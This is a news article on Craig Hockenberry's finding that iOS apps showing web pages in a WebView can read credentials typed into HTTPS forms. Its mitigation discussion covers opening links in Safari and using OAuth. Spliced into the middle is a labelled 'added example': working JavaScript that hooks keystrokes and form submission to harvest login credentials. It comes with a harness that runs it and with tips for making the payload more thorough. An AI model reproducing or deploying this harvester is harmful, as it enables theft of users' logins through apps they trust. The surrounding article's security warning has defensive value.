iOS In-App Browsing Poses Security Risk

iOS developer warns that browser windows invoked within third-party apps allow information theft.

iOS apps that present Web pages can be abused by malicious developers to steal login details, developer Craig Hockenberry said on Wednesday.

In a blog post, Hockenberry, a principal at app maker Iconfactory, explains that in-app browser windows -- what iOS developers call a WebView -- can be manipulated by the native code of the app that hosts them.

As a proof of concept, Hockenberry has posted a sample project that demonstrates how login credentials typed into a form inside a WebView, even on an HTTPS page, can be read in clear text by the native code presenting the WebView: TLS protects the connection, not the page from the app displaying it.

"The app is stealing your username and password by watching what you type on the site," Hockenberry said. "There’s nothing the site owner can do about this, since the WebView has control over JavaScript that runs in the browser."

The sample keylogger works by hooking the page's keyboard events (the KeyboardEvent API, parts of which are deprecated but still widely used to handle keyboard input on many Web pages). The deprecated API is not the root of the problem, and Hockenberry insists Web technologies of this sort are not inherently bad. Rather, he says, the iOS app has as much access to the Web page's JavaScript code as the developer of the Web page: anything the page's own scripts can do, including reading form fields, script injected by the host app can do too.
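To make the mechanism concrete, here is an added example (not Hockenberry's sample project, and not Iconfactory code): the kind of JavaScript a hostile host app could inject into a WebView once a login page has loaded, together with a constructed stand-in for the page so the whole thing runs offline in Node. The field names, the credentials and the DOM stand-in are made up for illustration; the payload itself uses only standard DOM calls. It goes slightly beyond the article's keystroke-watching by also hooking the form's submit event, which catches pasted or autofilled text that never produces a key event.

```javascript
// Added example, not code from Hockenberry's sample project: a credential
// harvester of the kind a hostile host app could inject into a WebView, plus a
// constructed stand-in for the login page so the whole thing runs offline in
// Node. On a real device the host app would hand the payload to the WebView
// (e.g. UIWebView's stringByEvaluatingJavaScriptFromString: after the page
// loads), and the page could not distinguish it from its own scripts.

// ---- Payload: the part that would be injected into the page ---------------
// `doc` is the page's document; `report` is where captured data goes. In a real
// attack `report` would exfiltrate (a fetch() to the attacker, or a navigation
// to a custom URL scheme the host app intercepts); here it just records.
function installCredentialHarvester(doc, report) {
  // Keystroke capture: what the article describes. ev.key is the printable
  // character; the deprecated keypress/keyCode route works the same way.
  for (const field of doc.querySelectorAll('input')) {
    field.addEventListener('keydown', (ev) => {
      if (typeof ev.key === 'string' && ev.key.length === 1) {
        report({ kind: 'key', field: field.name, key: ev.key });
      }
    });
  }
  // Submission capture: reads the final field values, so it also catches text
  // that arrived by paste or autofill and never produced a key event.
  for (const form of doc.querySelectorAll('form')) {
    form.addEventListener('submit', () => {
      const values = {};
      for (const f of form.elements) values[f.name] = f.value;
      report({ kind: 'submit', values });
    });
  }
}

// ---- Constructed stand-in for the DOM (scaffolding only) -------------------
// Implements just the API surface the payload touches, under the real DOM's
// names, so the payload above is exactly what a browser would run.
class FakeEventTarget {
  constructor() { this.listeners = new Map(); }
  addEventListener(type, fn) {
    if (!this.listeners.has(type)) this.listeners.set(type, []);
    this.listeners.get(type).push(fn);
  }
  dispatchEvent(ev) {
    ev.target = this;
    for (const fn of this.listeners.get(ev.type) || []) fn(ev);
  }
}
class FakeInput extends FakeEventTarget {
  constructor(name, type) { super(); this.name = name; this.type = type; this.value = ''; }
  // A user typing one character: the keydown the page sees, then the value change.
  typeChar(ch) { this.dispatchEvent({ type: 'keydown', key: ch }); this.value += ch; }
  // Paste or password-manager autofill: the value changes with no key events.
  paste(text) { this.value += text; }
}
class FakeForm extends FakeEventTarget {
  constructor(elements) { super(); this.elements = elements; }
  submit() { this.dispatchEvent({ type: 'submit' }); }
}
class FakeDocument {
  constructor(forms) { this.forms = forms; }
  querySelectorAll(selector) {
    if (selector === 'form') return this.forms;
    if (selector === 'input') return this.forms.flatMap((f) => f.elements);
    throw new Error('selector not supported by the stand-in: ' + selector);
  }
}

// ---- Scenario: a user logs in inside the booby-trapped WebView -------------
// Constructed credentials; the trailing '2' is pasted, not typed, to show the
// difference between the two capture methods.
function simulateLogin() {
  const captured = [];
  const user = new FakeInput('username', 'text');
  const pass = new FakeInput('password', 'password');
  const doc = new FakeDocument([new FakeForm([user, pass])]);
  installCredentialHarvester(doc, (r) => captured.push(r));
  for (const ch of 'alice') user.typeChar(ch);
  for (const ch of 'hunter') pass.typeChar(ch);
  pass.paste('2');
  doc.forms[0].submit();
  return captured;
}

// What the attacker reconstructs from keystrokes alone for one field.
function keystrokesFor(captured, fieldName) {
  return captured
    .filter((r) => r.kind === 'key' && r.field === fieldName)
    .map((r) => r.key)
    .join('');
}
// What the submit hook saw: the complete values, pasted text included.
function submittedValues(captured) {
  const s = captured.find((r) => r.kind === 'submit');
  return s ? s.values : null;
}

if (typeof require !== 'undefined' && require.main === module) {
  const captured = simulateLogin();
  console.log('keystrokes:', keystrokesFor(captured, 'username'), keystrokesFor(captured, 'password'));
  console.log('submitted:', submittedValues(captured));
}
```

Run it with `node`; the usage block at the bottom prints both captures. The keystroke log yields `hunter` for the password while the submit hook yields `hunter2`, which is why a thorough payload reads field values rather than relying on key events alone. Nothing the site can do about this from the server side changes the picture: the hooks run in the page's own JavaScript context, and HTTPS only protects the connection.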

Hockenberry advises that while in-app browsing can be useful for viewing Web content, iOS users should open Web links in mobile Safari because Apple's browser can't be accessed by third-party code in the same way as an in-app WebView.

Apple isn't likely to catch apps designed to exploit this technique, Hockenberry said, citing the huge number of apps that get reviewed every day and the ease with which malicious code can be concealed, through obfuscation or through a setting that disables the malicious mechanism until after the app has been reviewed and released.

One way to mitigate the risk of credential theft is OAuth, the authorization protocol that lets a user grant a third-party app or website access to an account at an Internet service such as Facebook, Google, or Yahoo without typing the account's password into that app.

But Hockenberry points out that proper implementation of OAuth calls for taking mobile app users outside the app to Safari to handle the authentication. This runs contrary to Apple's App Store Review Guidelines, specifically section 10.6, which states, "If your user interface is complex or less than very good, [your app] may be rejected." While handling user authentication in an app may offer a better user experience, best practices for OAuth implementation call for keeping apps and browser operations separate. (That separation was later made explicit in RFC 8252, OAuth 2.0 for Native Apps, which tells native apps to use an external user-agent such as the system browser rather than an embedded web view for the authorization request.)

Hockenberry argues, "... this is a case where user security trumps usability. Apple should change [its] policy for apps that use OAuth."

